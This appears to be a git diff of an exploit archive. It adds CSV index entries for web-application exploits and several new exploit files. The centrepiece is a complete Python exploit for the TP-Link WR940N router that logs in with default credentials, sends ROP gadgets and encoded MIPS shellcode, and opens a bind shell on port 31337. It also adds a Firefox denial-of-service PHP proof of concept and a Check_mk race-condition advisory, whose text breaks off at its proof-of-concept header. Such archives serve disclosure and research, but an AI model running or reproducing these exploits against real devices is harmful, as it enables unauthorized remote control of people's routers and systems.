Arbitrary Command Execution",2012-12-21,i-Hmx,php,webapps,0 -38141,platforms/php/webapps/38141.txt,"Hero Framework - search q Parameter Cross-Site Scripting",2012-12-24,"Stefan Schurtz",php,webapps,0 +38141,platforms/php/webapps/38141.txt,"Hero Framework - 'search?q' Cross-Site Scripting",2012-12-24,"Stefan Schurtz",php,webapps,0 38142,platforms/php/webapps/38142.txt,"Hero Framework - users/login 'Username' Cross-Site Scripting",2012-12-24,"Stefan Schurtz",php,webapps,0 38143,platforms/php/webapps/38143.txt,"cPanel - 'account' Cross-Site Scripting",2012-12-24,"Rafay Baloch",php,webapps,0 38144,platforms/php/webapps/38144.txt,"City Reviewer - 'search.php' Script SQL Injection",2012-12-22,3spi0n,php,webapps,0 @@ -36695,7 +36696,7 @@ id,file,description,date,author,platform,type,port 38428,platforms/php/webapps/38428.txt,"PHP Address Book - '/addressbook/register/linktick.php?site' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38429,platforms/php/webapps/38429.txt,"PHP Address Book - '/addressbook/register/reset_password.php' Multiple SQL Injections",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38430,platforms/php/webapps/38430.txt,"PHP Address Book - '/addressbook/register/reset_password_save.php' Multiple SQL Injections",2013-04-05,"Jurgen Voorneveld",php,webapps,0 -38431,platforms/php/webapps/38431.txt,"PHP Address Book - '/addressbook/register/router.php BasicLogin' Cookie SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 +38431,platforms/php/webapps/38431.txt,"PHP Address Book - '/addressbook/register/router.php?BasicLogin' Cookie SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38432,platforms/php/webapps/38432.txt,"PHP Address Book - '/addressbook/register/traffic.php?var' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38433,platforms/php/webapps/38433.txt,"PHP Address Book - '/addressbook/register/user_add_save.php?email' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 38434,platforms/php/webapps/38434.txt,"PHP Address Book - '/addressbook/register/checklogin.php?Username' SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0 @@ -36765,7 +36766,7 @@ id,file,description,date,author,platform,type,port 38551,platforms/java/webapps/38551.py,"JIRA and HipChat for JIRA Plugin - Velocity Template Injection",2015-10-28,"Chris Wood",java,webapps,0 38553,platforms/hardware/webapps/38553.txt,"Sagem FAST3304-V2 - Authentication Bypass (2)",2015-10-28,"Soufiane Alami Hassani",hardware,webapps,0 38560,platforms/php/webapps/38560.txt,"Caucho Resin - '/resin-admin/' URI Cross-Site Scripting",2013-06-07,"Gjoko Krstic",php,webapps,0 -38561,platforms/php/webapps/38561.txt,"Caucho Resin - 'index.php' logout Parameter Cross-Site Scripting",2013-06-07,"Gjoko Krstic",php,webapps,0 +38561,platforms/php/webapps/38561.txt,"Caucho Resin - 'index.php?logout' Cross-Site Scripting",2013-06-07,"Gjoko Krstic",php,webapps,0 38562,platforms/php/webapps/38562.txt,"HP Insight Diagnostics - Remote Code Injection",2013-06-10,"Markus Wulftange",php,webapps,0 38563,platforms/php/webapps/38563.txt,"HP Insight Diagnostics 9.4.0.4710 - Local File Inclusion",2013-06-10,"Markus Wulftange",php,webapps,0 38565,platforms/php/webapps/38565.txt,"Joomla! Component com_jnews 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80 @@ -36926,10 +36927,10 @@ id,file,description,date,author,platform,type,port 38877,platforms/php/webapps/38877.txt,"C2C Forward Auction Creator - '/auction/casp/Admin.asp' SQL Injection (Admin Authentication Bypass)",2013-12-16,R3d-D3V!L,php,webapps,0 38879,platforms/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator - Multiple SQL Injections",2013-12-14,R3d-D3V!L,asp,webapps,0 38880,platforms/php/webapps/38880.txt,"Veno File Manager - 'q' Arbitrary File Download",2013-12-11,"Daniel Godoy",php,webapps,0 -38881,platforms/php/webapps/38881.html,"Piwigo - admin.php Cross-Site Request Forgery (User Creation)",2013-12-17,sajith,php,webapps,0 +38881,platforms/php/webapps/38881.html,"Piwigo - 'admin.php' Cross-Site Request Forgery (User Creation)",2013-12-17,sajith,php,webapps,0 38882,platforms/cgi/webapps/38882.txt,"Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service",2013-12-16,"DTAG Group Information Security",cgi,webapps,0 38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - '/apps/news-events/newdetail.asp?id' SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0 -38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - '/login.asp' Multiple Field SQL Injections / Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0 +38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder 'QuickWeb' 1.0 - '/login.asp' Multiple Field SQL Injections / Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0 38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster - 'checktransferstatus.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster - 'additionalsettings.php' SQL Injection",2013-12-15,i-Hmx,php,webapps,0 @@ -37026,8 +37027,8 @@ id,file,description,date,author,platform,type,port 39069,platforms/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution",2015-12-21,bd0rk,php,webapps,80 39078,platforms/php/webapps/39078.txt,"Web Video Streamer - Multiple Vulnerabilities",2014-01-22,"Eric Sesterhenn",php,webapps,0 39079,platforms/php/webapps/39079.txt,"Atmail WebMail - Message Attachment File Name Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0 -39080,platforms/php/webapps/39080.txt,"Atmail WebMail - searchResultsTab5 filter Parameter Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0 -39081,platforms/php/webapps/39081.txt,"Atmail WebMail - INBOX.Trash mailId Parameter Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0 +39080,platforms/php/webapps/39080.txt,"Atmail WebMail - 'searchResultsTab5?filter' Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0 +39081,platforms/php/webapps/39081.txt,"Atmail WebMail - 'INBOX.Trash?mailId' Reflected Cross-Site Scripting",2013-03-25,"Vicente Aguilera Diaz",php,webapps,0 39083,platforms/php/webapps/39083.txt,"Bigware Shop 2.3.01 - Multiple Local File Inclusions",2015-12-23,bd0rk,php,webapps,80 39084,platforms/php/webapps/39084.txt,"Grawlix 1.0.3 - Cross-Site Request Forgery",2015-12-23,"Curesec Research Team",php,webapps,80 39085,platforms/php/webapps/39085.txt,"Arastta 1.1.5 - SQL Injection",2015-12-23,"Curesec Research Team",php,webapps,80 @@ -37083,7 +37084,7 @@ id,file,description,date,author,platform,type,port 39174,platforms/php/webapps/39174.txt,"Caldera - '/costview2/printers.php?tr' SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 39176,platforms/php/webapps/39176.html,"TOA - Cross-Site Request Forgery",2014-05-08,"High-Tech Bridge",php,webapps,0 39178,platforms/php/webapps/39178.txt,"CMS Touch - 'pages.php?Page_ID' SQL Injection",2014-05-08,indoushka,php,webapps,0 -39179,platforms/php/webapps/39179.txt,"CMS Touch - 'news.php' News_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0 +39179,platforms/php/webapps/39179.txt,"CMS Touch - 'news.php?News_ID' SQL Injection",2014-05-08,indoushka,php,webapps,0 39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0 39187,platforms/asp/webapps/39187.txt,"CIS Manager - 'email' SQL Injection",2014-05-16,Edge,asp,webapps,0 39188,platforms/php/webapps/39188.txt,"XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -37130,7 +37131,7 @@ id,file,description,date,author,platform,type,port 39267,platforms/php/webapps/39267.html,"Ilya Birman E2 - '/@actions/comment-process' SQL Injection",2014-07-23,"High-Tech Bridge",php,webapps,0 39268,platforms/php/webapps/39268.java,"Ubiquiti Networks UniFi Video Default - 'crossdomain.xml' Security Bypass",2014-07-23,"Seth Art",php,webapps,0 39269,platforms/php/webapps/39269.txt,"WordPress Plugin Lead Octopus Power - 'id' SQL Injection",2014-07-28,Amirh03in,php,webapps,0 -39270,platforms/php/webapps/39270.txt,"WordPress Plugin WhyDoWork AdSense - options-general.php Cross-Site Request Forgery (Option Manipulation)",2014-07-28,"Dylan Irzi",php,webapps,0 +39270,platforms/php/webapps/39270.txt,"WordPress Plugin WhyDoWork AdSense - 'options-general.php' Cross-Site Request Forgery (Option Manipulation)",2014-07-28,"Dylan Irzi",php,webapps,0 39271,platforms/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0 39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote File Inclusion",2014-07-28,"Govind Singh",php,webapps,0 39273,platforms/php/webapps/39273.txt,"CMSimple 4.4.4 - 'color' Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 @@ -37464,7 +37465,7 @@ id,file,description,date,author,platform,type,port 40171,platforms/linux/webapps/40171.txt,"AXIS (Multiple Products) - 'devtools ' Authenticated Remote Command Execution",2016-07-29,Orwelllabs,linux,webapps,80 40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 -40129,platforms/python/webapps/40129.txt,"Django CMS 3.3.0 - (Editor Snippet) Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,python,webapps,80 +40129,platforms/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,python,webapps,80 40133,platforms/multiple/webapps/40133.html,"Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation",2016-07-20,LiquidWorm,multiple,webapps,8088 40134,platforms/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,multiple,webapps,8088 40135,platforms/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,multiple,webapps,8088 @@ -37483,7 +37484,7 @@ id,file,description,date,author,platform,type,port 40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80 40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80 -40174,platforms/php/webapps/40174.txt,"WordPress Plugin Ultimate Product Catalog 3.9.8 - (do_shortcode via ajax) Blind SQL Injection",2016-07-29,"i0akiN SEC-LABORATORY",php,webapps,80 +40174,platforms/php/webapps/40174.txt,"WordPress Plugin Ultimate Product Catalog 3.9.8 - do_shortcode via ajax Blind SQL Injection",2016-07-29,"i0akiN SEC-LABORATORY",php,webapps,80 40180,platforms/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7/3.8 SP1 (3.81)/3.8 SP2 (3.82) - 'hotfix_upload.cgi' Filename Remote Code Execution",2016-07-29,korpritzombie,linux,webapps,443 40185,platforms/php/webapps/40185.py,"phpMyAdmin 4.6.2 - Authenticated Remote Code Execution",2016-07-29,@iamsecurity,php,webapps,80 40189,platforms/php/webapps/40189.txt,"WordPress Plugin Booking Calendar 6.2 - SQL Injection",2016-08-01,"Edwin Molenaar",php,webapps,80 @@ -37707,7 +37708,7 @@ id,file,description,date,author,platform,type,port 40979,platforms/php/webapps/40979.php,"Zend Framework / zend-mail < 2.4.11 - Remote Code Execution",2016-12-30,"Dawid Golunski",php,webapps,0 40982,platforms/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",hardware,webapps,0 40983,platforms/hardware/webapps/40983.html,"D-Link DI-524 - Cross-Site Request Forgery",2016-12-09,"Felipe Soares de Souza",hardware,webapps,0 -40986,platforms/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps,0 +40986,platforms/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps,0 40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0 40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0 40998,platforms/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps,0 @@ -38711,3 +38712,7 @@ id,file,description,date,author,platform,type,port 43011,platforms/php/webapps/43011.txt,"Career Portal 1.0 - SQL Injection",2017-10-17,8bitsec,php,webapps,0 43012,platforms/php/webapps/43012.txt,"Wordpress Plugin Car Park Booking - SQL Injection",2017-10-17,8bitsec,php,webapps,0 43015,platforms/php/webapps/43015.txt,"Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities",2017-10-18,"SEC Consult",php,webapps,0 +43018,platforms/windows/webapps/43018.html,"ZKTime Web Software 2.0 - Cross-Site Request Forgery",2017-08-18,"Arvind V",windows,webapps,0 +43019,platforms/windows/webapps/43019.txt,"ZKTime Web Software 2.0 - Improper Access Restrictions",2017-08-18,"Arvind V",windows,webapps,0 +43021,platforms/python/webapps/43021.py,"Check_MK 1.2.8p25 - Information Disclosure",2017-10-18,"Julien Ahrens",python,webapps,0 +43022,platforms/hardware/webapps/43022.py,"TP-Link WR940N - Authenticated Remote Code Exploit",2017-10-17,"Fidus InfoSecurity",hardware,webapps,0 diff --git a/platforms/android/remote/35637.py b/platforms/android/dos/35637.py similarity index 100% rename from platforms/android/remote/35637.py rename to platforms/android/dos/35637.py diff --git a/platforms/hardware/remote/19531.txt b/platforms/hardware/dos/19531.txt similarity index 100% rename from platforms/hardware/remote/19531.txt rename to platforms/hardware/dos/19531.txt diff --git a/platforms/hardware/webapps/43022.py b/platforms/hardware/webapps/43022.py new file mode 100755 index 000000000..015b85ad3 --- /dev/null +++ b/platforms/hardware/webapps/43022.py @@ -0,0 +1,169 @@ +import urllib2 +import base64 +import hashlib +from optparse import * +import sys +import urllibbanner = ( +"___________________________________________________________________________\n" +"WR940N Authenticated Remote Code Exploit\n" +"This exploit will open a bind shell on the remote target\n" +"The port is 31337, you can change that in the code if you wish\n" +"This exploit requires authentication, if you know the creds, then\n" +"use the -u -p options, otherwise default is admin:admin\n" +"___________________________________________________________________________" +) + +def login(ip, user, pwd): + print "[+] Attempting to login to http://%s %s:%s"%(ip,user,pwd) + + #### Generate the auth cookie of the form b64enc('admin:' + md5('admin')) + hash = hashlib.md5() + hash.update(pwd) + auth_string = "%s:%s" %(user, hash.hexdigest()) + encoded_string = base64.b64encode(auth_string) + print "[+] Encoded authorisation: %s" %encoded_string + + #### Send the request + url = "http://" + ip + "/userRpm/LoginRpm.htm?Save=Save" + print "[+] sending login to " + url + req = urllib2.Request(url) + req.add_header('Cookie', 'Authorization=Basic %s' %encoded_string) + resp = urllib2.urlopen(req) + + #### The server generates a random path for further requests, grab that here + data = resp.read() + next_url = "http://%s/%s/userRpm/" %(ip, data.split("/")[3]) + print "[+] Got random path for next stage, url is now %s" %next_url + + return (next_url, encoded_string) + +#custom bind shell shellcode with very simple xor encoder +#followed by a sleep syscall to flush cash before running +#bad chars = 0x20, 0x00 +shellcode = ( +#encoder +"\x22\x51\x44\x44\x3c\x11\x99\x99\x36\x31\x99\x99" +"\x27\xb2\x05\x4b" #0x27b2059f for first_exploit +"\x22\x52\xfc\xa0\x8e\x4a\xfe\xf9" +"\x02\x2a\x18\x26\xae\x43\xfe\xf9\x8e\x4a\xff\x41" +"\x02\x2a\x18\x26\xae\x43\xff\x41\x8e\x4a\xff\x5d" +"\x02\x2a\x18\x26\xae\x43\xff\x5d\x8e\x4a\xff\x71" +"\x02\x2a\x18\x26\xae\x43\xff\x71\x8e\x4a\xff\x8d" +"\x02\x2a\x18\x26\xae\x43\xff\x8d\x8e\x4a\xff\x99" +"\x02\x2a\x18\x26\xae\x43\xff\x99\x8e\x4a\xff\xa5" +"\x02\x2a\x18\x26\xae\x43\xff\xa5\x8e\x4a\xff\xad" +"\x02\x2a\x18\x26\xae\x43\xff\xad\x8e\x4a\xff\xb9" +"\x02\x2a\x18\x26\xae\x43\xff\xb9\x8e\x4a\xff\xc1" +"\x02\x2a\x18\x26\xae\x43\xff\xc1" + +#sleep +"\x24\x12\xff\xff\x24\x02\x10\x46\x24\x0f\x03\x08" +"\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa" +"\x27\xa4\xfb\xfa\x01\x01\x01\x0c\x21\x8c\x11\x5c" + +################ encoded shellcode ############### +"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x98\x59\xb9\xbe\x01\xc0\x28\x27\x28\x06" +"\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x23\x39\x44\x44\x30\x50\xff\xff" +"\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d" +"\x7a\x69" #<————————- PORT 0x7a69 (31337) +"\x24\x0f\xfd\xff\x01\xe0\x78\x27\x01\xcf\x78\x04\x01\xaf\x68\x25\xaf\xad" +"\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x9b\x89\xb9\xbc" +"\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff\xe0\x24\x02\x10\x49\x01\x01" +"\x01\x0c\x24\x0f\x73\x50" +"\x9b\x89\xb9\xbc\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x24\x0f" +"\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48" +"\x01\x01\x01\x0c\x24\x0f\x73\x50\x30\x50\xff\xff\x9b\x89\xb9\xbc\x24\x0f" +"\xff\xfd\x01\xe0\x28\x27\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50" +"\x9b\x89\xb9\xbc\x28\x05\x01\x01\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f" +"\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\xbd\x9b\x96\x46\x01\x01\x01\x0c" +"\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce" +"\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8" +"\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c\x24\x02" +"\x10\x46\x24\x0f\x03\x68\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa" +"\x27\xa4\xfb\xfe\x01\x01\x01\x0c\x21\x8c\x11\x5c" +) + +###### useful gadgets ####### +nop = "\x22\x51\x44\x44" +gadg_1 = "\x2A\xB3\x7C\x60" +gadg_2 = "\x2A\xB1\x78\x40" +sleep_addr = "\x2a\xb3\x50\x90" +stack_gadg = "\x2A\xAF\x84\xC0" +call_code = "\x2A\xB2\xDC\xF0" + +def first_exploit(url, auth): + # trash $s1 $ra + rop = "A"*164 + gadg_2 + gadg_1 + "B"*0x20 + sleep_addr + "C"*4 + rop += "C"*0x1c + call_code + "D"*4 + stack_gadg + nop*0x20 + shellcode + + params = {'ping_addr': rop, 'doType': 'ping', 'isNew': 'new', 'sendNum': '20', 'pSize': '64', 'overTime': '800', 'trHops': '20'} + + new_url = url + "PingIframeRpm.htm?" + urllib.urlencode(params) + + print "[+] sending exploit..." + print "[+] Wait a couple of seconds before connecting" + print "[+] When you are finished do http -r to reset the http service" + + req = urllib2.Request(new_url) + req.add_header('Cookie', 'Authorization=Basic %s' %auth) + req.add_header('Referer', url + "DiagnosticRpm.htm") + + resp = urllib2.urlopen(req) + +def second_exploit(url, auth): + url = url + "WanStaticIpV6CfgRpm.htm?" + # trash s0 s1 s2 s3 s4 ret shellcode + payload = "A"*111 + "B"*4 + gadg_2 + "D"*4 + "E"*4 + "F"*4 + gadg_1 + "a"*0x1c + payload += "A"*4 + sleep_addr + "C"*0x20 + call_code + "E"*4 + payload += stack_gadg + "A"*4 + nop*10 + shellcode + "B"*7 + print len(payload) + + params = {'ipv6Enable': 'on', 'wantype': '2', 'ipType': '2', 'mtu': '1480', 'dnsType': '1', + 'dnsserver2': payload, 'ipAssignType': '0', 'ipStart': '1000', + 'ipEnd': '2000', 'time': '86400', 'ipPrefixType': '0', 'staticPrefix': 'AAAA', + 'staticPrefixLength': '64', 'Save': 'Save', 'RenewIp': '1'} + + new_url = url + urllib.urlencode(params) + + print "[+] sending exploit…" + print "[+] Wait a couple of seconds before connecting" + print "[+] When you are finished do http -r to reset the http service" + + req = urllib2.Request(new_url) + req.add_header('Cookie', 'Authorization=Basic %s' %auth) + req.add_header('Referer', url + "WanStaticIpV6CfgRpm.htm") + + resp = urllib2.urlopen(req) + +if __name__ == '__main__': + print banner + username = "admin" + password = "admin" + + parser = OptionParser() + parser.add_option("-t", "–target", dest="host", + help="target ip address") + + parser.add_option("-u", "–user", dest="username", + help="username for authentication", + default="admin") + + parser.add_option("-p", "–password", dest="password", + help="password for authentication", + default="admin") + + (options, args) = parser.parse_args() + + if options.host is None: + parser.error("[x] A host name is required at the minimum [x]") + + if options.username is not None: + username = options.username + if options.password is not None: + password = options.password + + (next_url, encoded_string) = login(options.host, username, password) + + ###### Both exploits result in the same bind shell ###### + #first_exploit(data[0], data[1]) + second_exploit(next_url, encoded_string). \ No newline at end of file diff --git a/platforms/linux/remote/19103.c b/platforms/linux/dos/19103.c similarity index 100% rename from platforms/linux/remote/19103.c rename to platforms/linux/dos/19103.c diff --git a/platforms/linux/local/21362.c b/platforms/linux/local/21362.c index f0b57fa05..a7e58c9d6 100755 --- a/platforms/linux/local/21362.c +++ b/platforms/linux/local/21362.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/4413/info Oracle 8i is a powerful relational database product. It is available for Windows, Linux, and a wide range of Unix operating systems. @@ -5,6 +6,7 @@ Oracle 8i is a powerful relational database product. It is available for Windows A vulnerability has been reported with some versions of Oracle 8i for Linux. A local attacker able to execute the tnslsnr process may pass an oversized command line parameter and cause a buffer overflow, possibly leading to the execution of arbitrary code as the user 'oracle'. Versions of Oracle 8i available for other operating systems have not yet been confirmed as vulnerable. +*/ /* * Yet another exploit for the 'Unbreakable' Oracle database diff --git a/platforms/multiple/dos/43020.txt b/platforms/multiple/dos/43020.txt new file mode 100755 index 000000000..9d4f5c617 --- /dev/null +++ b/platforms/multiple/dos/43020.txt @@ -0,0 +1,38 @@ +# Exploit Title: Mozilla Firefox < 55 - Forcibly make someone view a web content +# Category: Denial of Service +# Date: 5/11/17 +# CVE : CVE-2017-7783 +# Affected Version: < Mozilla Firefox 55 +# Tested on: Windows/Linux +# Software Link: https://www.mozilla.org/en-US/firefox/52.0/releasenotes/ +# Exploit Author: Amit Sangra +# Website: http://CyberCriminals.net + +# Description: + +If a long user name is used in a username/password combination in a site URL (such as http://UserName:Password@example.com), the resulting modal prompt will hang in a non-responsive state or crash, causing a denial of service. + +# Impact: + +An attacker can create a webpage having some content and exploit. +Now once a victim visits this webpage, his browser gets locked out and he is forcibly made to view attacker supplied content. + +# Exploit: + +

Firefox Lockout Vulnerability

"; +//Content to be forcibly viewed +echo ""; +//End +echo ""; +?> + +# Solution: + +Update to version 55 +https://www.mozilla.org/en-US/firefox/55.0/releasenotes/ + +# Mozilla Foundation Security Advisory: +https://www.mozilla.org/en-US/security/advisories/mfsa2017-18/#CVE-2017-7783 \ No newline at end of file diff --git a/platforms/php/webapps/42981.txt b/platforms/php/webapps/42981.txt index d91f2c5df..851fd5ea9 100755 --- a/platforms/php/webapps/42981.txt +++ b/platforms/php/webapps/42981.txt @@ -1,9 +1,11 @@ -# Exploit Title: E-Sic Software livre CMS - Sql Injection# Date: -12/10/2017# Exploit Author: Elber Tavares +# Exploit Title: E-Sic Software livre CMS - Sql Injection +# Date: 12/10/2017 +# Exploit Author: Elber Tavares # fireshellsecurity.team/ -# Vendor Homepage: https://softwarepublico.gov.br/# Version: 1.0# -Tested on: kali linux, windows 7, 8.1, 10 - Firefox# Download -https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar +# Vendor Homepage: https://softwarepublico.gov.br/ +# Version: 1.0 +# Tested on: kali linux, windows 7, 8.1, 10 - Firefox +# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar More informations: http://whiteboyz.xyz/esic-software-publico-sql-injection.html diff --git a/platforms/python/webapps/43021.py b/platforms/python/webapps/43021.py new file mode 100755 index 000000000..496411032 --- /dev/null +++ b/platforms/python/webapps/43021.py @@ -0,0 +1,211 @@ +1. ADVISORY INFORMATION +======================= +Product: Check_mk +Vendor URL: https://mathias-kettner.de/check_mk.html +Type: Race Condition [CWE-362] +Date found: 2017-09-21 +Date published: 2017-10-18 +CVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) +CVE: CVE-2017-14955 + + +2. CREDITS +========== +This vulnerability was discovered and researched by Julien Ahrens from +RCE Security. + + +3. VERSIONS AFFECTED +==================== +Check_mk v1.2.8p25 +Check_mk v1.2.8p25 Enterprise +older versions may be affected too. + + +4. INTRODUCTION +=============== +Check_MK is comprehensive IT monitoring solution in the tradition of Nagios. +Check_MK is available as Raw Edition, which is 100% pure open source, and as +Enterprise Edition with a lot of additional features and professional support. + +(from the vendor's homepage) + + +5. VULNERABILITY DETAILS +======================== +Check_mk is vulnerable to an unauthenticated information disclosure through a +race condition during the authentication process when trying to authenticate +with a valid username and an invalid password. + +On a failed login, the application calls the function save_users(), which +performs two os.rename operations on the files "contacts.mk.new" and +"users.mk.new" (see /packages/check_mk/check_mk-1.2.8p25/web/htdocs/userdb.py): + +[..] + # Check_MK's monitoring contacts + filename = root_dir + "contacts.mk.new" + out = create_user_file(filename, "w") + out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n") + out.write("contacts.update(\n%s\n)\n" % pprint.pformat(contacts)) + out.close() + os.rename(filename, filename[:-4]) + + # Users with passwords for Multisite + filename = multisite_dir + "users.mk.new" + make_nagios_directory(multisite_dir) + out = create_user_file(filename, "w") + out.write("# Written by Multisite UserDB\n# encoding: utf-8\n\n") + out.write("multisite_users = \\\n%s\n" % pprint.pformat(users)) + out.close() + os.rename(filename, filename[:-4]) +[...] + +When sending many concurrent authentication requests with an existing/valid +username, such as: + +POST /check_mk/login.py HTTP/1.1 +Host: localhost +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---9519178121294961341040589727 +Content-Length: 772 +Connection: close +Upgrade-Insecure-Requests: 1 + +---9519178121294961341040589727 +Content-Disposition: form-data; name="filled_in" + +login +---9519178121294961341040589727 +Content-Disposition: form-data; name="_login" + +1 +---9519178121294961341040589727 +Content-Disposition: form-data; name="_origtarget" + +index.py +---9519178121294961341040589727 +Content-Disposition: form-data; name="_username" + +omdadmin +---9519178121294961341040589727 +Content-Disposition: form-data; name="_password" + +welcome +---9519178121294961341040589727 +Content-Disposition: form-data; name="_login" + +Login +---9519178121294961341040589727-- + +Then it could happen that one of both os.rename() calls references a non- +existing file, which has just been renamed by a previous thread. This causes the +Python script to fail and throw a crash report, which discloses a variety of +sensitive information, such as internal server paths, account details including +hashed passwords: + +Local Variables
{'contacts': {u'admin': {'alias': u'Administrator',
+                             'contactgroups': ['all'],
+                             'disable_notifications': False,
+                             'email': u'admin@example.com',
+                             'enforce_pw_change': False,
+                             'last_pw_change': 0,
+                             'last_seen': 0.0,
+                             'locked': False,
+                             'num_failed': 0,
+                             'pager': '',
+                             'password': '$1$400000$13371337asdfasdf',
+                             'roles': ['admin'],
+                             'serial': 2},
+
+A script to automatically exploit this vulnerability can be found on [0].
+
+6. POC
+======
+
+#!/usr/bin/python
+# Exploit Title: Check_mk <=3D v1.2.8p25 save_users() Race Condition
+# Version:       <=3D 1.2.8p25
+# Date:          2017-10-18
+# Author:        Julien Ahrens (@MrTuxracer)
+# Homepage:      https://www.rcesecurity.com
+# Software Link: https://mathias-kettner.de/check_mk.html
+# Tested on:     1.2.8p25
+# CVE:=09=09 CVE-2017-14955
+#
+# Howto / Notes:
